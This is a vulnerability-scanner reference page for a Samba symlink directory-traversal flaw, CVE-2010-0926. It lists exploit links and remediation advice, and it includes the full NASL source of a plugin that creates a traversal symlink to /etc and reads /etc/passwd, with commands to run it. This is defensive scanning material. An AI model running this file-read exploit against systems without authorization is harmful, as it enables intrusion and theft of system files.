Samba Symlink Traversal Arbitrary File Access (unsafe check) - Nessus

High   Plugin ID: 44406

This page contains detailed information about the Samba Symlink Traversal Arbitrary File Access (unsafe check) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 44406
Name: Samba Symlink Traversal Arbitrary File Access (unsafe check)
Filename: samba_symlink_dir_traversal.nasl
Vulnerability Published: 2010-02-04
This Plugin Published: 2010-02-08
Last Modification Time: 2018-11-15
Plugin Version: 1.22
Plugin Type: local
Plugin Family: Misc.
Dependencies: smb_accessible_shares.nasl
Required KB Items [?]: SMB/samba

Vulnerability Information

Severity: High
Vulnerability Published: 2010-02-04
Patch Published: N/A
CVE [?]: CVE-2010-0926
CPE [?]: cpe:/a:samba:samba

Synopsis

The remote file server is prone to a symlink attack.

Description

The remote Samba server is configured insecurely and allows a remote attacker to gain read or possibly write access to arbitrary files on the affected host. Specifically, if an attacker has a valid Samba account for a share that is writable or there is a writable share that is configured to be a guest account share, he can create a symlink using directory traversal sequences and gain access to files and directories outside that share.

Note that successful exploitation requires that the Samba server's 'wide links' parameter be set to 'yes', which is the default.

Solution

Set 'wide links = no' in the [global] section of smbd.conf.

Public Exploits

Target Network Port(s): 139, 445
Target Asset(s): N/A
Exploit Available: True (Exploit-DB, GitHub)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Samba Symlink Traversal Arbitrary File Access (unsafe check) vulnerability:

  1. Exploit-DB: exploits/multiple/remote/41740.txt
    [EDB-41740: Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory]
  2. GitHub: https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/41740.zip
    [EDB-41740]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:POC/RL:OF/RC:C
CVSS Base Score:7.5 (High)
Impact Subscore:6.4
Exploitability Subscore:10.0
CVSS Temporal Score:5.9 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:5.9 (Medium)

Go back to menu.

Plugin Source

This is the samba_symlink_dir_traversal.nasl nessus plugin source code. This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof. 

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(44406);
  script_version("1.22");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_bugtraq_id(38111);
  script_cve_id("CVE-2010-0926");
  script_xref(name:"Secunia", value:"38454");

  script_name(english:"Samba Symlink Traversal Arbitrary File Access (unsafe check)");
  script_summary(english:"Attempts to grab /etc/passwd");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote file server is prone to a symlink attack."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote Samba server is configured insecurely and allows a remote
attacker to gain read or possibly write access to arbitrary files on
the affected host.  Specifically, if an attacker has a valid Samba
account for a share that is writable or there is a writable share that
is configured to be a guest account share, he can create a symlink
using directory traversal sequences and gain access to files and
directories outside that share. 

Note that successful exploitation requires that the Samba server's
'wide links' parameter be set to 'yes', which is the default."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/fulldisclosure/2010/Feb/99"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.youtube.com/watch?v=NN50RtZ2N74"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.samba.org/samba/news/symlink_attack.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Set 'wide links = no' in the [global] section of smbd.conf."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date",value:"2010/02/04");
  script_set_attribute(attribute:"plugin_publication_date",value:"2010/02/08");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:samba:samba");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("smb_accessible_shares.nasl");
  script_require_ports(139, 445);
  script_require_keys("SMB/samba");

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("smb_func.inc");
include("byte_func.inc");
include("data_protection.inc");

SET_PATH_INFO = 0x06;
SET_FILE_UNIX_LINK = 0x0201;


# taken from smb_kb917159.nasl
function smb_get_error_code(data)
{
  local_var header, flags2, code;

  # Some checks in the header first
  header = get_smb_header (smbblob:data);
  if (!header)
    return NULL;

  flags2 = get_header_flags2 (header:header);
  if (flags2 & SMB_FLAGS2_32BIT_STATUS)
  {
    code = get_header_nt_error_code (header:header);
  }
  else
  {
    code = get_header_dos_error_code (header:header);
  }

  return code;
}

function create_symlink(source, target)
{
  local_var header, link_src, link_target, link_param, link_data, data, params;
  local_var smb_params, smb_data, nb_pkt, ret;

  if (isnull(source))
  {
    err_print('create_symlink(): missing required argument "source".');
    return NULL;
  }
  if (isnull(target))
  {
    err_print('create_symlink(): missing required argument "target".');
    return NULL;
  }

  header = smb_header(Command:SMB_COM_TRANSACTION2,
                      Status:nt_status (Status: STATUS_SUCCESS));

  link_param = raw_word(w:SET_FILE_UNIX_LINK) + # level of interest
               raw_dword(d:0) + # reserved
               unicode(string:target) + mkword(0);
  link_data = unicode(string:source) + mkword(0);
  data = link_param + link_data;

  params = raw_word(w:strlen(link_param)) +  # param len
           raw_word(w:strlen(link_data)) +   # data len
           raw_word(w:2) +      # parameter count
           raw_word(w:0xffff) + # max data count
           raw_byte(b:0) +      # max setup count
           raw_byte(b:0) +      # reserved
           raw_word(w:0) +      # flags
           raw_dword(d:0) +     # timeout (return immediately)
           raw_word(w:0) +      # reserved
           raw_word(w:strlen(link_param)) +     # param len
           raw_word(w:68) +     # parameter offset
           raw_word(w:strlen(link_data)) +     # data len
           raw_word(w:68+strlen(link_param)) + # data offset
           raw_byte(b:1) +  # setup count
           raw_byte(b:0) +  # reserved
           raw_word(w:SET_PATH_INFO); # subcommand
  
  smb_params = smb_parameters(data:params);
  smb_data = smb_data(data:mkbyte(0)+mkword(0)+data);
  nb_pkt = netbios_packet(header:header, parameters:smb_params, data:smb_data);
  ret = smb_sendrecv (data:nb_pkt);

  if (!ret)
    return NULL;

  return smb_get_error_code(data:ret);
}


#
# execution begins here
#

axx_shares = get_kb_item("SMB/accessible_shares/1");
axx_shares = split(axx_shares, sep:'\n', keep:FALSE);
share = NULL;

# we need to know at least one writable share in order to test for this
foreach line (axx_shares)
{
  match = eregmatch(string:line, pattern:'^- (.+)  - \\((.+)\\)$');
  if (match)
  {
    if ('writable' >< match[2])
    {
      share = match[1];
      break;
    }
    else
      debug_print('Share "'+share+'" is not writable.');
  }
  else err_print("Error parsing accessible share data.");
}

if (isnull(share))
  exit(0, 'No writable shares were enumerated on the remote host.');

name    =  kb_smb_name();
port    =  kb_smb_transport();
if (!get_port_state(port)) exit(0, "Port "+port+" is not open.");
login   =  kb_smb_login();
pass    =  kb_smb_password();
domain  =  kb_smb_domain();

soc = open_sock_tcp(port);
if (!soc) exit(1, "Failed to open a socket on port "+port+".");

session_init(socket:soc, hostname:name);
rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);
if (rc != 1)
{
  NetUseDel();
  exit(1, "Can't connect to '"+share+"' share.");
}

# attempt to create a symlink using a directory traversal
link_name = SCRIPT_NAME+'-'+unixtime();
ret = create_symlink(
  source:'../../../../../../../../../../etc',
  target:link_name
);

if (ret != STATUS_SUCCESS)
{
  NetUseDel();
  exit(0, "The host is not affected.");
}

# If the dir traversal worked, we should be able to read the passwd file
file = link_name+'\\passwd';

fh = CreateFile(
  file:file,
  desired_access:GENERIC_READ,
  file_attributes:FILE_ATTRIBUTE_NORMAL,
  share_mode:FILE_SHARE_READ,
  create_disposition:OPEN_EXISTING
);

# grab the contents of the passwd file
passwd = '';
if (fh)
{
  len = 1024;
  idx = 0;

  repeat
  {
    data = ReadFile(handle:fh, length:len, offset:idx);
    passwd += data;
    idx += strlen(data);
  } until (strlen(data) < len);

  CloseFile(handle:fh);
}

NetUseDel();

if (strlen(passwd) > 0)
{
  passwd = data_protection::redact_etc_passwd(output:passwd);
  if (report_verbosity > 0)
  {
    report = '\nNessus was able to read the contents of /etc/passwd :\n\n'+
             crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n'+
             passwd+'\n'+
             crap(data:"-", length:30)+" snip "+crap(data:"-", length:30)+'\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else exit(1, 'Unable to read "'+file+'" from share "'+share+'".');

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/samba_symlink_dir_traversal.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\samba_symlink_dir_traversal.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/samba_symlink_dir_traversal.nasl

Go back to menu.

How to Run

Here is how to run the Samba Symlink Traversal Arbitrary File Access (unsafe check) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select Misc. plugin family.
  6. On the right side table select Samba Symlink Traversal Arbitrary File Access (unsafe check) plugin ID 44406.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl samba_symlink_dir_traversal.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a samba_symlink_dir_traversal.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - samba_symlink_dir_traversal.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state samba_symlink_dir_traversal.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: Secunia Advisory: CWE | Common Weakness Enumeration:
  • CWE-22 (Weakness) Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
See also: Similar and related Nessus plugins:
  • 68484 - Oracle Linux 5 : samba (ELSA-2012-0313)
  • 58067 - RHEL 5 : samba (RHSA-2012:0313)
  • 45339 - openSUSE Security Update : cifs-mount (cifs-mount-2128)
  • 45340 - openSUSE Security Update : cifs-mount (cifs-mount-2128)
  • 45341 - openSUSE Security Update : cifs-mount (cifs-mount-2128)
  • 45130 - SuSE 11 Security Update : Samba (SAT Patch Number 2126)
  • 45453 - SuSE9 Security Update : Samba (YOU Patch Number 12595)
  • 45471 - SuSE 10 Security Update : Samba (ZYPP Patch Number 6920)
  • 49834 - SuSE 10 Security Update : Samba (ZYPP Patch Number 6921)
  • 45343 - Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : samba vulnerability (USN-918-1)
  • 122056 - Samba < 2.2.8a Remote Code Execution Vulnerability
  • 25217 - Samba < 3.0.25 Multiple Vulnerabilities
  • 29253 - Samba < 3.0.28 send_mailslot Function Remote Buffer Overflow
  • 17720 - Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow
  • 47036 - Samba 3.x < 3.3.13 SMB1 Packet Chaining Memory Corruption
  • 55733 - Samba 3.x < 3.3.16 / 3.4.14 / 3.5.10 Multiple Vulnerabilities
  • 82580 - Samba 3.0.0 'SamrChangePassword' RCE
  • 69276 - Samba 3.x < 3.5.22 / 3.6.x < 3.6.17 / 4.0.x < 4.0.8 read_nttrans_ea_lis DoS
  • 132023 - Samba 4.x < 4.9.17 / 4.10.x < 4.10.11 / 4.11.x < 4.11.3 Multiple Vulnerabilities
  • 133210 - Samba 4.x < 4.9.18 / 4.10.x < 4.10.12 / 4.11.x < 4.11.5 Multiple Vulnerabilities
  • 81485 - Samba 3.5.x < 3.5.22 / 3.6.x < 3.6.25 / 4.0.x < 4.0.25 / 4.1.x < 4.1.17 TALLOC_FREE() RCE
  • 138223 - Samba 4.x < 4.10.17 / 4.11.x < 4.11.11 / 4.12.x < 4.12.4 Multiple Vulnerabilities
  • 142419 - Samba 3.6.x < 4.11.15 / 4.12.x < 4.12.9 / 4.13.x < 4.13.1 Multiple Vulnerabilities
  • 149699 - Samba 4.12.x < 4.12.14 / 4.13.x < 4.13.7 / 4.14.x < 4.14.2 Multiple DoS
  • 149350 - Samba 3.6.x < 4.12.15 / 4.13.x < 4.13.8 / 4.14.x < 4.14.4 Unauthorized File Access
  • 155620 - Samba 4.13.x < 4.13.14 / 4.14.x < 4.14.10 / 4.15.x < 4.15.2 Multiple Vulnerabilities
  • 157360 - Samba 4.13.x < 4.13.17 / 4.14.x < 4.14.12 / 4.15.x < 4.15.5 Multiple Vulnerabilities
  • 90508 - Samba 3.x < 4.2.10 / 4.2.x < 4.2.10 / 4.3.x < 4.3.7 / 4.4.x < 4.4.1 Multiple Vulnerabilities (Badlock)
  • 100388 - Samba 3.5.x < 4.4 / 4.4.x < 4.4.14 / 4.5.x < 4.5.10 / 4.6.x < 4.6.4 Shared Library RCE
  • 103535 - Samba 4.4.x < 4.4.16 / 4.5.x < 4.5.14 / 4.6.x < 4.6.8 Multiple Vulnerabilities
  • 108378 - Samba 4.5.x < 4.5.16 / 4.6.x < 4.6.14 / 4.7.x < 4.7.6 Multiple Vulnerabilities
  • 130628 - Samba 4.5.x / 4.6.x / 4.7.x / 4.8.x / 4.9.x < 4.9.15 / 4.10.x < 4.10.10 / 4.11.x < 4.11.2 Password Complexity Check Bypass (CVE-2019-14833)
  • 130629 - Samba 4.x < 4.9.15 / 4.10.x < 4.10.10 AD DC LDAP Server Denial of Service (CVE-2019-14847)
  • 25216 - Samba NDR MS-RPC Request Heap-Based Remote Buffer Overflow
  • 58662 - Samba 3.x < 3.6.4 / 3.5.14 / 3.4.16 RPC Multiple Buffer Overflows

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file samba_symlink_dir_traversal.nasl version 1.22. For more plugins, visit the Nessus Plugin Library.

Go back to menu.